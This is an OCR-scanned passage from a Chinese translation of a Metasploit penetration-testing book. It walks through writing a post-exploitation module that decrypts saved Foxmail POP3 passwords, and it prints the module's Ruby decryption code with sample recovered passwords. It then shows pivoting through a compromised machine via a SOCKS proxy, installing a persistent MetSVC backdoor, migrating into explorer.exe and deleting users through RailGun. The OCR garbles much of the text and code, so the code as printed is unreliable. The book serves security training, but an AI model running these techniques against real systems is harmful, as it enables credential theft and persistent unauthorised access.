'Author' -» ['Nipun Jaswal'], 
'Platform' => [ 'win' ], 
'SessionTypes' => [ 'Meterpreter' ] 


) ) 
end 


上 面 模块 中 给 出 的 代码 十 分 简单 ,仍然 是 先导 入 所 有 需要 的 库 文件 , 再 给 出 关于 这 个 模块 的 
基本 信息 。 


我 们 之 前 已 经 学 习 过 了 Msf::Post::Windows: :Registry 和 Msf::Auxiliary::Report 


的 用 法 ， 下 面 给 出 了 本 例 中 新 出 现 一 些 库 文件 的 介绍 。 
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引入 语句 路 B A B 
Msf::Post::Windows::UserProfiles  lib/msf/core/post/windows/user profiles.rb 4$ ff T Windows Æ 
统 的 所 有 配置 文 
件 ， 包 括 对 重要 目 
录 和 路 径 的 查找 
Msf::Post::File lib/msf/core/post/file.rb 提供 了 各 种 操作 文 


在 开始 学 习 模块 的 下 一 部 分 前 ， 先 来 了 解 一 下 收集 登录 凭证 的 整个 过 程 


o 


VEBUER RC, (IA 


目录 列举 、 文 人 


入 等 


(1) 首先 搜索 用 户 文件 ， 查 找 当 前 用 户 的 LocalAppData 文 件 夹 的 准确 位 置 。 
(2) 使 用 上 面 找到 的 位 置 , 并 将 其 与 \VirtualStore\Program Files (x86)\Tencent\Foxmail\mail 


连接 ， 建 立 一 个 mail 文 件 夹 的 完整 路 径 。 


[XC 
f 


件 读 取 、 目录 检查 、 


FS 


(3) 列 出 mail 文 件 夹 下 的 所 有 文件 夹 ， 并 将 它们 都 保存 到 一 个 数组 中 。 在 mail 文 件 中 的 每 
一 个 文件 夹 的 名 字 都 对 应 着 一 个 邮箱 用 户 名 ， 比 如 nipunjaswal@rocketmail.com 就 可 以 是 mail 


文件 夹 下 的 一 个 文件 夹 。 
(4) 在 mail 文 件 夹 下 的 accounts 文 件 中 查找 Account.stg 文 件 。 
(5) 通过 读 取 Account.stg 文 件 ， 会 发 现 名 为 POP3Password 的 喻 希 。 
(6) 将 这 个 值 传递 给 解密 方法 ， 然 后 就 会 得 到 明文 密码 。 
(7) 将 这 些 值 保存 到 数据 库 。 


A 


怎么 样 ， 很 简单 吧 。 下 面 对 代 码 进行 分 析 : 


def run 
profile - grab user profiles() 
counter = 0 


data entry = "" 
profile.each do |user | 
if user['LocalAppData'] 
full. path = user['LocalAppData'] 
full path = full path-«"NNVirtualStoreNMProgram Files 
(x86) \\Tencent\\Foxmail\\mail" 
if directory? (full_path) 
print good("Fox Mail Installed, Enumerating Mail Accounts") 
session.fs.dir.foreach(full path) do l|dir list| 
if dir list =~ /G/ 
counter-counter-«1 
full path mail = full path+ "" + dir list + "" + "Account.stg" 
if file?(full path mail) 
print good("Reading Mail Account $s(counter)") 
file content = read file(full. path mail).split("Mn") 


2.00 开发 自 定义 模块 75 


在 分 析 上 述 代 码 之 前 , 先 来 看 看 代码 中 都 使 用 了 哪些 重要 的 函数 ,以 便 我 们 能 更 好 地 了 人 解 这 
些 代码 。 


函数 库 文 件 用 € 
grab user profiles() lib/msf/core/post/windows/user profiles.rb 在 Windows 系 统 平台 上 抓 取 所 有 
directory? lib/msf/core/post/file.rb 检查 一 个 指定 的 目录 是 否 存在 
file? lib/msf/core/post/file.rb 检查 一 个 指定 的 文件 是 否 存在 
read file lib/msf/core/post/file.rb 读 取 一 个 文件 的 内 容 
store loot /lib/msf/core/auxiliary/report.rb 将 收集 到 的 信息 保存 到 一 个 文件 
和 数据 库 中 


从 上 面 的 代码 中 可 以 看 出 ， 我 们 使 用 grab_user_profiles() 抓 取 了 配置 文件 ， 并 尝试 寻 
找 每 个 文件 的 LocalAppData 文 件 夹 。 一 旦 找到 ， 就 将 它 保存 在 一 个 名 为 ful11_path 的 变量 中 。 


接 下 来 将 这 个 路 径 与 mail 文 件 夹 组 合 ， 在 mail 文 件 夹 中 所 有 的 用 户 名 都 以 子 文件 夹 名 形式 展 
现 。 可 以 使 用 airectory? 方 法 检查 该 文件 夹 是 否 存在 ; 一 旦 成 功 ， 就 使 用 正则 表达 式 将 所 有 包 
含 e 字 符 的 文件 夹 名 保存 到 gir_1ist 中 。 接 下 来 , 创建 男 一 个 变量 fu11_path_mail, 保存 每 个 
email 到 Account.stg 的 准确 路 径 。 可 以 使 用 file? 方 法 来 查看 Account.stg 文 件 是 否 存 在 ; 如 果 存 在 ， 
则 读 取 这 个 文件 ,然后 将 其 所 有 内 容 都 以 换行 符 分隔 开 。 将 分 隔 后 的 内 容 保存 到 file_content 
列表 ， 下 面 给 出 了 代码 的 其 他 部 分 。 


file content.each do |Phashl 

if hash -- /POP3Password/ 

hash data = hash.split("-") 

hash, value = hash data[1] 

if hash value.nil? 

print error("No Saved Password") 

else 

print good("Decrypting Password for mail account: #{dir_ list)") 

decrypted pass - decrypt (hash value,dir list) 

data entry << "Username:" «dir list + "Nt" + "Password:" + 
decrypted, pass+"\n" 

end 

end 

end 

end 

end 

end 

end 

end 

end 

store loot("Foxmail 
Accounts","text/plain",session,data entry,"Fox.txt","Fox Mail Accounts") 

end 
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我 们 对 file_content 中 的 每 一 个 条 上 日 都 进行 了 检查 ， 以 便 查 找 其 中 的 POP3Password。 一 
旦 找到 这 样 的 字段 ， 利 用 = 将 这 个 字段 进行 分 割 ， 并 将 其 中 的 值 保存 到 变量 nash_value 中 。 


接 下 来 就 可 以 将 hash_value 和 dir_lis 


c 用户 名 ) 传递 给 函数 aecrypt Of. ME 


之 后 ， 明 文 密码 将 被 保存 到 变量 aecrypteq_pass 中 。 再 创建 一 个 名 为 aata_entry 的 变量 ， 然 
后 将 所 有 登录 凭证 都 添加 到 其 中 。 之 所 以 这 样 做 , 是 因为 我 们 并 不 知道 在 目标 上 一 共 配 置 了 多 少 
邮箱 账户 。 因 此 ， 每 一 个 登录 凭证 的 结果 都 要 添加 到 gata_entry 中 。 当 所 有 操作 完成 以 后 ,使 
用 store_loot 方 法 将 data_entry 变 量 保存 到 数据 库 中 。 我 们 要 问 store_loot 提 供 6 个 参数 ， 
分 别 是 收集 的 名 称 、 内 容 类 型 、session、data_entry、 文 件 的 名 称 以 及 收集 的 描述 。 


下 面 给 出 了 解密 函数 的 具体 实现 : 


def decrypt (hash real,dir list) 


decoded = "" 

magic - Array[126, 100, 114, 97, 71, 
fc0 - 90 

size = (hash real.length)/2 - 1 


index = 0 
b = Array.new(size) 


for i in 0 .. size do 

b[i] = (hash real[index,2]).hex 
index = index«2 

end 


b[0] » b[0] ^ £cO 
double magic = magic-«magic 


d = Array.new(b.length-1) 
for i in 1 .. b.length-1 do 
d[i-1] = b[i] ^ double magic[i-1] 
end 

e - Array.new(d.length) 

for i in 0 .. d.length-1 

if (d[i] - b[i] « 0) 

e[i] -» d[i] «» 255 - b[i] 
else 

e[i] » d[i] - b[i] 

end 

decoded «« e[i].chr 

end 


111, 110, 126] 


print good("Found Username fs(dir list) with Password: fs(decoded)") 


return decoded 
end 
end 


上 面 的 方法 接收 了 两 个 参数 ,分 别 是 密码 的 哈 希 值 和 用 户 名 。 变 量 magic 是 解密 密 钥 ,存储 
为 数组 的 形式 ， 数 组 中 的 内 容 依 次 是 字符 串 ~araGon~ 的 10 进 制 数字 表示 。 将 整数 90 保 存在 fc0 


中 ,一 会 再 解释 这 人 么 做 的 原因 。 


接 下 来 ， 通 过 将 哈 希 值 除 以 2 并 从 中 减 去 1 来 得 出 它 的 长 度 ， 这 个 长 度 也 是 新 创建 的 数组 p 的 


长 度 。 
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在 下 一 步 中 ， 将 哈 希 值 分 成 字 节 ( 每 次 两 个 字符 )， 然 后 将 它们 存储 到 数组 b 中 。 对 数组 b 中 
的 第 一 个 字 节 与 fc0 进 行 XZOR 操 作 , 然后 再 将 结果 保存 到 数组 b 的 第 一 个 字 节 处 。 因 此 , 通过 与 90 
进行 XOR 操 作 可 以 更 新 b[0] 的 值 。 这 一 点 对 Foxmail 6.5 也 适用 。 


现在 复制 magic 数组 两 次 ， 生 成 一 个 新 的 数组 aouble_magic。 声 明 dqouble_magic 数 组 的 
长 度 比 数组 pb 长度 短 1。 对 除数 组 b 中 的 第 一 个 元 素 以 外 的 所 有 元 素 与 数组 aouble_magic 中 的 所 
有 元 素 执 行 XOR 操 作 。 注 意 ， 不 对 数组 b 中 的 第 一 个 已 经 执行 过 XoR 运 算 的 元 素 进行 这 个 操作 。 


将 XOoR 的 结果 保存 到 数组 a。 下 一 条 指令 从 数组 bp 中 减 去 数组 a 的 内 容 , 但 当 相 减 的 结果 小 于 0 
时 ,将 结果 加 255。 


下 一 步 需要 将 数组 e 中 特定 元 素 的 ASCI[ 值 添加 到 aecodqeq 变 量 中 ， 并 将 其 返回 到 调用 语句 中 。 
下 面 给 出 了 这 个 模块 的 运行 界面 。 


msf > use post/windows/gather/credentials/foxmail 
msf post(foxmail) » set SESSION 2 

SESSION => 2 

msf post(foxmail) » run 


Fox Mail Installed, Enumerating Mail Accounts 
Reading Mail Account 1 
Decrypting Password for mail account: dum.yum20140gmail.com 
Found Username dum.yum201480gmail.com with Password: Yum012345 
Reading Mail Account 2 
Decrypting Password for mail account: isdeeepülive.com 
Found Username isdeeepülive.com with Password: Metasploit680143 
[*] Post module execution completed 
msf post(foxmail) > sessions -i 2 
[*] Starting interaction with 2... 


meterpreter » sysinfo 


(Computer : DESKTOP-PESQ21S 

OS : Windows 10 (Build 10586). 
Architecture : x64 (Current Process is WOW64) 
System Language : en US 

Domain : WORKGROUP 

Logged On Users : 2 

Meterpreter : x86/win32 


很 明显 ， 我 们 可 以 轻松 地 对 存储 在 Foxmail 6.5 中 的 登录 凭证 进行 解密 了 。 
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在 目标 计算 机 上 获得 一 个 Meterpreter 命 令 行 控制 权限 是 每 一 个 攻击 者 都 梦 才 以 求 的 。 
Meterpreter 可 以 向 攻击 者 提供 用 于 在 被 渗透 计算 机 上 完成 各 种 任务 的 各 种 工具 。 除 此 之 外 ， 
Meterpreter 还 有 很 多 内 置 的 脚本 可 以 使 用 ， 这 使 得 攻击 者 可 以 更 轻松 地 攻击 系统 。 这 些 脚本 可 以 
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在 被 渗透 的 计算 机 上 执行 或 简单 、 或 复杂 的 任务 。 在 本 节 中 , 可 以 看 到 这 些 脚本 的 组 成 部 分 以 及 
如 何在 Meterpreter 中 利用 这 些 脚 本 。 


的 从 以 下 网 页 可 获得 Meterpreter 的 基本 命令 速 查 表 : http://scadahacker.com/library/ 
Documents/Cheat Sheets/Hacking%2-%2Meterpreter%2Cheat%2%2Sheet.pdf。 


2.3.1 Meterpreter 脚本 的 要 点 


到 目前 为 止 ， 我 们 已 经 见识 了 Meterpreter 的 威力 。 当 需要 在 目标 系统 执行 指定 任务 时 ， 都 可 
以 通过 Meterpreter 实 现 。 然 而 在 进行 渗透 测试 时 ， 可 能 会 出 现 一 些 特殊 的 需求 。 往 往 Meterpreter 
中 现 有 的 模块 并 不 具备 这 些 功能 。 在 这 种 情况 下， 我们 希望 将 能 够 完成 任务 的 自 定 义 功能 模块 添 
加 到 Meterpreter 中 。 我 们 先 来 执行 一 下 Meterpreter 的 高 级 功能 ， 领 略 一 下 它 的 威力 。 


2.3.2 ”以 被 控制 的 计算 机 为 跳板 


跳板 攻击 指 的 是 攻击 者 将 已 经 被 成 功 渗透 的 计算 机 作为 跳板 来 攻击 别 的 计算 机 ,假设 这 样 一 
个 场景 : 这 里 有 一 个 限制 访问 的 Web 服 务 器 。 这 个 服务 器 的 安全 措施 设 定 了 只 有 Alice 的 计算 机 可 
以 访问 。 这 种 情况 将 需要 首先 渗透 并 控制 Alice 的 计算 机 , 然后 利用 它 去 连接 限制 访问 的 目标 Web 
服务 器 。 这 意味 着 以 Alice 的 计算 机 作为 跳板 ， 将 我 们 发 出 的 所 有 攻击 流量 通过 Alice 的 计算 机 转 
发 给 目标 Web 服 务 器 。 下 面 的 图 示 给 出 了 一 个 更 直观 的 示意 。 


Charlie 的 Web 服 务 器 
IP: 192.168.75.140 
建立 连接 ) 


( 仅 允 许 Alice 的 计算 机 与 


IP: 192.168.75.130 


在 上 图 中 可 以 看 到 有 三 台 计 算 机 。 有 Mallory 渗 透 攻击 者 ) 的 计算 机 ，Alice 的 计算 机 ， 以 
及 访问 权限 受到 限制 的 Charlie 的 Web 服 务 器 。 这 台 Web 服 务 器 中 一 个 名 为 限制 访问 的 目录 拒绝 了 
除 Alice 的 系统 ( 卫 地 址 为 192.168.75.130 ) 以 外 的 所 有 访问 。 因 此 ， 当 攻击 者 试图 直接 建立 对 Web 
服务 器 的 访问 时 ， 在 攻击 者 的 浏览 器 中 会 出 现 如 下 错误 提示 。 
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(1403 Forbidden | E | 


@ |@ 192.168.75.140/restrict «e| 图 ~ 


圈 Most Visitedv  WlBOffensive Security ‘Ñ Kali Linux Kali Docs KlExploit-DB W Aircrack-ng 


Forbidden 


You don't have permission to access /restrict on this server. 


Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch Server at 192.168.75.140 Port 80 


我 们 知道 ， 作 为 经 过 授权 的 人 员 ，Alice 拥 有 连接 Web 服 务 器 的 权限 。 因 此 需要 一 些 方法 将 
我 们 对 服务 器 发 起 的 请 求 通过 Alice 的 计算 机 转发 出 去 。 需 要 的 这 种 方法 就 是 跳板 技术 。 

此 , 第 一 步 就 是 要 渗透 进入 Alice 的 计算 机 ,并 且 取 得 目标 系统 的 Meterpreter 命 令 行 控制 权 
限 。 接 下 来 需要 像 上 一 章 一 样 添加 一 条 到 Web 服 务 器 的 路 由 项 。 这 将 允许 发 往 目 标 Web 服 务 器 的 
请 求 通过 Alice 的 计算 机 进行 路 由 中 转 。 让 我 们 看 一 下 执行 的 步骤 。 

执行 autoroute 脚 本 , 并 使 用 -s 将 脚本 的 参数 设 定 为 那 台 我 们 无 法 访问 的 主机 的 卫 地 址 , 这 
样 就 可 以 在 已 经 被 我 们 成 功 渗透 的 Alice 的 主机 上 添加 一 条 到 达 Charlie 主 机 的 路 由 。 


下 一 步 需要 建立 一 个 代理 服务 器 将 所 有 的 请 求 通过 Meterpreter 会 话 传 给 目标 Web 服 务 器 。 


以 Mallory 的 角度 来 看 , 现在 需要 启动 一 个 可 以 将 请 求 通过 Meterpreter 发 送 给 目标 的 模块 。 可 
以 选择 auxiliary/server/socks4a 这 个 模块 。 让 我 们 看 看 这 是 如 何 做 到 的 。 


msf  auxiliary(socks4a) > show options 


Module options (auxiliary/server/socks4a): 


Name Current Setting Required Description 
SRVHOST 0.0.0.0 yes The address to listen on 
SRVPORT 1080 yes The port to listen on. 


msf  auxiliary(socks4a) > set SRVHOST 127.0.0.1 
SRVHOST => 127.0.0.1 

msf auxiliary(socks4a) > run 

[*] Auxiliary module execution completed 


为 了 启动 socks 服 务 器 ， 我 们 将 SRVHOST 设 置 为 127.0.0.1， 并 将 SRVPORT 设 置 为 1080， 然 
后 运行 模块 。 

接 下 来 ,需要 重新 配置 文件 etc/proxychains.conf 中 的 设置 。 方 法 是 在 端口 1080 上 将 辅助 服务 
器 的 地 址 127.0.0.1 添 加 到 该 文件 ， 如 下 面 的 屏幕 截图 所 示 。 


[ProxyList] 

H add proxy here ... 

"8 meanwile 

H defaults set to "tor" 
socks4 127.0.0.1 1080 


AE 
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现在 我 们 要 设置 工具 来 使 用 代理 联网 ， 如 Firefox、Chrome 、Nmap、rdesktop 等 。 计 我 们 来 配 
置 浏览 器 的 代理 服务 器 设置 ， 如 下 图 所 示 。 


Connection Settings 
Configure Proxies to Access the Internet 
O No proxy 
O Auto-detect proxy settings for this network 


O Use system proxy settings 


® Manual proxy configuration: 


HTTP Proxy: | | Port: | 0 E 


口 Use this proxy server for all protocols 


SSL Proxy: | | Port: | of 
ETP Proxy: | | Port: | of 
SOCKS Host: | 127.0.0.1 | Port: | 1080 | 


(9 SOCKS v4 O SOCKS v5 
No Proxy for: 


Example: .mozilla.org, .net.nz, 192.168.1.0/24 


O Automatic proxy configuration URL: 


MEHKA HERRA e B BR d] H e P BST DR 


C]http//192.168.75.140/restrict/ | ap | 


@ [& 192.168.75.140/restrict/| «e| | 图 ~ oj ee 


Ex Most Visited v Fl Offensive Security ` Kali Linux Ñ Kali Docs KliExploit-DB W Aircrack-ng 


Welcome, This is Restricted Area , Only Accessible to 
192.168.75.130 


成 功 了 ! 我 们 轻松 获得 了 目标 限制 访问 目录 的 访问 权限 。 在 目标 Web 服 务 器 上 的 restrict 目 录 
上 运行 着 一 个 了 记录 器 ， 让 我 们 来 看 一 下 它 返 回 的 关于 登录 了 的 结果 。 


@ |@ 192.168.75.140/restrict/ip.php 


Most Visitedv 上 国 offensive Security "NH 


Your IP 18192.168.75.130 


也 成 功 了 ! 我 们 以 被 渗透 的 Alice 的 计算 机 IP 地 址 来 访问 目标 Web 服 务 器 。 不 管 我 们 对 Web 服 
务 如 做 了 什么 操作 ， 在 Web 服 务 右 眼中 这 一 切 都 是 Alice 的 计算 机 做 的 。 然 而 ,我 们 的 真实 IP 却 是 
192.168.75.105 
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让 我 们 快速 回顾 一 下 刚才 的 操作 。 


口 首先 渗透 Alice 的 计算 机 。 

OQ 接着 通过 在 Alice 的 计算 机 上 安装 的 Meterpreter 添 加 了 一 条 到 Charlie 的 限制 访问 服务 器 的 
路 由 项 。 

a 然后 建立 了 一 个 socks 代 理 服务 器 ， 以 实现 将 所 有 的 网 络 数据 流量 都 自动 地 通过 Meterpreter 
发 送 到 Alice 的 计算 机 上 。 
Q 根据 新 建立 的 socks 代 理 服务 器 地 址 重新 配置 了 系统 的 代理 设置 文件 。 
口 将 浏览 器 的 代理 地 址 设置 为 socks 的 地 址 。 


有 关 在 Meterpreter 命 令 行 中 通过 socks 代 理 服务 器 使 用 Nessus 对 目标 的 网 络 内 
€d 部 进行 扫描 的 更 多 信息 ， 请 访问 http:/www.digininja.org/blog/nessus_over Sock4a_ 
over msfphp。 


2.3.3 设置 永久 访问 权限 


在 获得 目标 计算 机 的 控制 权限 以 后 , 必须 让 这 个 来 之 不 易 的 权限 持久 化 。 不 过 对 于 授权 的 渗 
透 测 试 ， 只 有 在 许可 的 时 间 和 范围 内 才 需 要 实现 控制 权限 的 持久 化 。 利 用 Meterpreter， 可 以 通过 
MetSVC 和 Persistence 两 种 不 同 的 方法 在 目标 计算 机 上 安装 后 门 程序 。 


对 我 们 来 说 ， Persistence 不 是 一 个 新 的 内 容 ， 在 上 一 章 中 我 们 讨论 了 如 何 利 用 这 种 方法 
保持 对 目标 主机 的 控制 权限 。 现 在 看 看 MetSVC 的 工作 流程 。 


MetSVC 安 装 在 被 成 功 渗透 的 目标 主机 上 , 然后 以 系统 服务 形式 运行 。 而 且 MetSVC 会 打开 目 
标 主机 的 一 个 端口 ， 这 个 端口 将 会 永久 性 地 向 攻击 者 开放 。 只 要 攻击 者 愿意 ,就 可 以 在 任何 时 候 
连接 到 目标 主机 上 。 


在 目标 计算 机 上 安装 MetSVC 是 一 个 很 简单 的 工作 ， 来 看 看 如 何 完成 这 个 任务 。 


meterpreter > run metsvc -A 

[*] Creating a meterpreter service on port 31337 

[*] Creating a temporary installation directory C: WINDOWSNTEMPNbPYQYuXAbCWKLOM. 
*] >> Uploading metsrv.dll... 
*] >> Uploading metsvc-server.exe... 
+] >> Uploading metsvc.exe... 

| Starting the service... 


* Installing service metsvc 


+ 


* Starting service 
Service metsvc successfully installed. 


[*] Trying to connect to the Meterpreter service at 192.168.75.130:31337... 
meterpreter > [+] Meterpreter session 2 opened (192.168.75.138:41542 -> 192.168. 
75.130:31337) at 2013-09-17 21:07:31 +0000 
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可 以 看 到 MetSVC 在 31337 端 口 创 建 了 一 个 服务 ,然后 上 传 了 一 个 恶意 的 软件 到 目标 计算 机 。 


今后 ， 每 当 需 要 访问 该 服务 ,我 们 只 需要 打开 exploit/multi/handler， 将 攻击 载荷 设置 为 
metsvc_bind_tcp， 就 能 够 再 次 连接 到 服务 。 这 一 切 如 下 面 的 屏幕 截图 所 示 。 


msf > use exploit/multi/handler 

msf exploit(handler) > set payload windows/metsvc bind tcp 
payload => windows/metsvc bind tcp 

msf  exploit(handler) > set RHOST 192.168.75.130 

RHOST => 192.168.75.130 

imsf ^exploit(handler) > set LPORT 31337 

LPORT => 31337 

msf  exploit(handler) > exploit 


[*] Starting the payload handler... 
[*] Started bind handler 
[*] Meterpreter session 3 opened (192.168.75.138:42455 -» 192.168.75.130:31337) 


meterpreter > 


即使 目标 主机 重新 启动 了 ，MetSVC 的 效果 仍然 存在 。 当 需要 永久 地 获得 目标 主机 的 控制 权 
限时 ， 这 一 点 是 十 分 方便 的 。 另 外 ， 这 样 也 节省 了 再 次 渗透 攻击 的 时 间 。 


2.3.4 API 调用 和 mixins 类 


我 们 刚刚 见识 到 了 Meterpreter 的 高 级 功能 ， 这 些 功能 确实 使 渗透 测试 工程 师 的 工作 轻松 了 
很 多 。 


现在 让 我 们 深入 研究 Meterpreter 的 工作 机 制 ， 揭 示 Meterpreter 模 块 和 脚本 的 基本 创建 过 程 。 
这 是 因为 有 些 时 候 仅 仅 使 用 Meterpreter 可 能 完成 不 了 所 有 的 指定 任务 。 在 这 种 情形 下 ， 就 需要 开 
发 自 定义 模块 去 执行 或 者 自动 化 渗透 攻击 阶段 的 各 种 任务 。 

首先 来 了 解 一 下 Meterpreter 脚 本 的 基础 知识 。Meterpreter 编 程 的 基础 就 是 应 用 编程 接口 
( Application Programming Interface, API ) 调用 和 mixins 类 。 在 需要 调用 Windows 动 态 链接 库 
( Dynamic Link Library, DLL ) 文件 或 者 调用 一 些 Ruby 编 写 的 模块 时 ， 这 两 者 是 必 不 可 少 的 。 

mixins 是 Ruby 编 程 语言 中 的 一 个 基础 类 。 这 个 类 包含 了 其 他 类 的 各 种 方法 。 当 我 们 试图 在 目 
标 计算 机 上 完成 各 种 任务 时 ，mixins 是 极其 有 用 的 。 除 此 以 外 ，mixins 并 不 完全 是 IRB 的 一 部 分 ， 
但 是 它 可 以 帮助 你 轻松 编写 更 具体 、 更 先进 的 Meterpreter 脚 本 。 


有 关 mixins 的 更 多 信息 ， 请 访问 http:/www.offensive-security.com/Metasploit- 
unleashed/Mixins and Plugins, 


建议 你 在 /lib/rex/post/meterpreter 和 /lib/msf/scripts/meterpreter 目 录 中 详细 了 解 Meterpreter 所 使 
用 的 各 种 库 文件 。 


API 调 用 指 的 是 在 Windows 系 统 下 从 DLL 文 件 中 调用 指定 的 功能 。 在 2.4 市 将 学 习 API 调 用 。 
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2.3.5 制作 自 定义 Meterpreter 脚本 


先 来 完成 一 个 简单 的 Meterpreter 脚 本 实例 ， 这 个 脚本 将 会 检查 我 们 当前 是 否 为 管理 员 用 户 ， 
然后 找到 explorer 进 程 ， 并 自动 迁移 到 这 个 进程 中 。 


在 开始 编写 之 前 ， 先 来 了 解 一 些 即 将 使 用 到 的 重要 函数 。 


KO A EAF A B 
is_admin /lib/msf/core/post/windows/priv.rb 检查 当前 会 话 是 否 具有 管理 员 权 限 
session.sys.process.ge /lib/rex/post/meterpreter/extensions/ 列 出 目标 系统 当前 运行 的 所 有 进程 
t processes() stdapi/sys/process.rb 
session.core.migrate() /lib/rex/post/meterpreter/client . 将 控制 程序 从 当前 进程 转移 到 由 参数 
uS 指定 的 PID 所 代表 的 进程 上 
来 看 看 下 面 的 代码 : 


admin check = is admin? 
f (admin, check) 
print good("Current User Is Admin") 
else 
print error("Current User is Not Admin") 
end 
Session.sys.process.get processes().each do |x| 
if x['name'].downcase--"explorer.exe" 
print good("Explorer.exe Process is Running with PID f(x['pid'])") 
explorer ppid - x['pid'].to i 
print good("Migrating to Explorer.exe at PID #{explorer_ ppid.to s)") 
Session.core.migrate(explorer. ppid) 
end 
end 


这 段 脚 本 以 调用 is_adqmin () 函数 开始 ， 将 布尔 类 型 的 结果 保存 到 一 个 名 为 adamin_check 
的 变量 中 。 根 据 变量 adamin "rid if-else% 条 件 i 者 句 会 输出 不 同 的 值 。 


ETK, Eget processes KEANE 程 列表 中 查找 explorerexe 进 ER RIZ, 
这 个 进程 的 PID 赋 值 给 sxploretr_ppidq。 在 下 一 行 代码 中 ， 使 用 session.core.migrate 语 句 
将 控制 程序 迁移 到 explorer.exe 进 程 上 。 


这 是 最 简单 的 脚本 之 一 。 然而 , 这 里 有 个 问题 , 在 /lib/msf/seripts/meterpreter 中 只 有 5 个 文件 ， 
而 且 这 5 个 文件 中 都 没有 定义 任何 函数 。 那 么 Meterpreter 到 底 是 在 哪里 调用 这 些 函 数 的 呢 ? 我 们 
可 以 看 看 这 5 个 文件 ， 如 下 面 的 屏幕 截图 所 示 。 


oot@kali; /usr/share/metasploit-framework/lib/msf/scripts# ls 

eterpreter meterpreter.rb 
ooteékali:/usr/share/metasploit-framework/lib/msf/scripts£& cd meterpreter/ 
ootékali:/usr/share/metasploit-framework/lib/msf/scripts/meterpreter£ ls 
ccounts.rb common.rb file.rb registry.rb services.rb 
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当 打 开 这 5 个 文件 时 ,可 以 发 现 这 些 脚 本 已 经 从 Metasploit 的 各 个 地 方 引 入 了 所 有 必要 的 库 文 
件 。 因 此 不 再 需要 额外 地 引入 这 些 函 数 的 库 文件 。 

把 这 段 代 码 保存 为 /scripts/meterpretermymetrb ， 然 后 在 Meterpreter 中 执行 这 段 代 码 ， 将 得 到 
以 下 输出 。 


meterpreter > run mymet 
[-] Current User is Not Admin 
Explorer.exe Process is Running with PID 10868 
Migrating to Explorer.exe at PID 10868 
meterpreter > 


现在 我 们 清楚 地 了 解 到 , 无 论 是 编写 Meterpreter 脚 本 , 执行 各 种 任务 , 还 是 实现 任务 的 自动 化 ， 
这 一 切 都 是 那么 简单 。 建 议 你 仔细 研究 模块 中 引入 的 文件 和 路 径 ， 以 便 更 深入 地 了 解 Meterpreter。 


各 根据 Metasploit 在 维基 百科 上 的 介绍 ， 你 不 该 再 去 编写 Meterpreter 脚 本 ， 而 是 
去 编写 一 些 后 渗透 模块 。 


2.4 与 RailGun 协同 工作 


RailGun 的 意思 好 像 是 一 种 轨道 上 的 枪 。 然 而 ， 它 并 非 这 个 意思 。 它 的 实际 威力 可 大 得 多 。 
RailGun 人 允许 你 在 不 编译 自己 的 DLL 文件 的 情况 下 直接 调用 Windows 的 API。 


它 支 持 数目 众多 的 Windows DLL 文件 , 并 且 为 攻击 者 在 目标 计算 机 上 获得 系统 级 权限 提供 了 
便利 的 途径 。 让 我 们 看 看 如 何 使 用 RailGun 去 执行 各 种 任务 ， 以 及 如 何 使 用 它 去 完成 一 些 高 级 的 
后 渗透 攻击 工作 。 


2.4.1 ZER Ruby 命令 行 基础 


在 使 用 RailGun 之 前 ， 需 要 先 在 Meterpreter 命 令 行 中 载 和 irb 命 令 行 。 
Meterpreter 命 令 行 切 换 到 irp 命 令 行 。 


图 演示 了 如 何 从 


7] 


meterpreter > irb 
[*] Starting IRB shell 
[*] The 'client' variable holds the meterpreter client 


>> 2 

=> 2 

>> print("Hi") 
Hi=> nil 


> 


可 以 在 上 图 中 看 到 ， 简 单 地 输入 irb 就 可 以 从 Meterpreter 命 令 行 切 换 到 交互 式 Ruby 命 令 行 。 
可 以 通过 Ruby 命 令 行 执行 各 种 任务 。 
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2.4.2 了 解 RailGun 及 其 脚本 编写 


RailGun 具 有 极为 强大 的 能 力 。 有 些 任务 Metasploit 不 能 胜任 ，RailGun 却 可 以 顺利 完成 。 可 以 
通过 RailGun 使 得 目标 系统 的 DLL 文 件 出 现 更 多 的 异常 ， 并 且 创 造 出 更 先进 的 后 渗透 方法 。 

现在 来 看 看 如 何 通过 RailGun 在 一 个 方法 中 调用 基础 API， 以 及 它 是 如 何 工作 的 。 

client.railgun.DLLname.function(parameters) 


这 是 在 RailGun 中 调用 API 的 基本 结构 。 关 键 字 client .railgun 定 义 了 我 们 需要 客户 端的 
RailGun 功 能 。 关 键 字 DLLname 指 明了 在 执行 一 个 DLL 文件 调用 时 要 使 用 的 DLL 名 称 。 关 键 字 
function (parameters) 指 定 需要 从 DLL 文件 中 调用 的 API 函 数 作为 参数 。 


来 看 一 个 例子 。 


meterpreter > irb 
[*] Starting IRB shell 
[*] The 'client' variable holds the meterpreter client 


>> client.railgun.user32.LockWorkStation () 


=> {"GetLastError"=>0, "ErrorMessage"=>"The operation completed successfully.", "return"=>true} 
>> B 


这 个 API 调 用 执行 的 结果 如 下 图 所 示 。 


3e. Windows / Home Basic 


在 这 里 ， 从 user32.dl! 文 件 中 调用 的 Lockworkstation() 函数 执行 后 导致 被 渗透 系统 进入 了 
锁定 状态 。 


接着 ， 我 们 来 看 看 这 个 API 的 调用 方法 以 及 它 的 参数 使 用 。 


client.railgun.netapi32.NetUserDel(arg1,agr2) 


目前 有 以 下 用 户 。 


i. Windows 7 Home Basic 


来 试 试 删除 一 个 用 户 名 为 Nipun 的 用 户 。 


>> client.railgun.netapi32.NetUserDel (nil,"Nipun") 
F> {"GetLastError"=>997, "ErrorMessage"=>"FormatMessage failed to retrieve the error. 
>> J 


", "return"=>0} 


检查 一 下 用 户 是 否 被 成 功 删 除 。 


Apex 


Logged on 
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成 功 搞定 ! 这 个 用 户 已 经 消失 了 。RailGun 真 的 是 一 个 相当 有 效 的 工具 ， 它 已 经 成 功 将 用 户 
Nipun 从 系统 中 删除 了 。 在 进行 下 一 步 之 前 ， 先 来 看 一 下 将 参数 的 值 设 为 nil1 的 含义 。 值 nil 指 
明了 用 户 是 在 局 域 网 中 工作 。 然 而 ,如 果 系 统 的 目标 是 在 一 个 不 同 的 网 络 中 , 则 应 该 把 参数 的 值 
设 定 为 目标 系统 的 NET-BIOS 值 。 


2.4.8 控制 Windows 中 的 API 调用 


DLL 文件 是 大 多 数 任务 能 否 顺利 完成 的 关键 。 因 此 ， 重 中 之 重 就 是 明确 哪个 DLL 文件 中 包含 
了 哪个 方法 。 从 一 个 正确 的 DLL 文件 中 调用 合适 的 方法 会 产生 一 个 简单 的 警告 框 。 与 Metasploit 
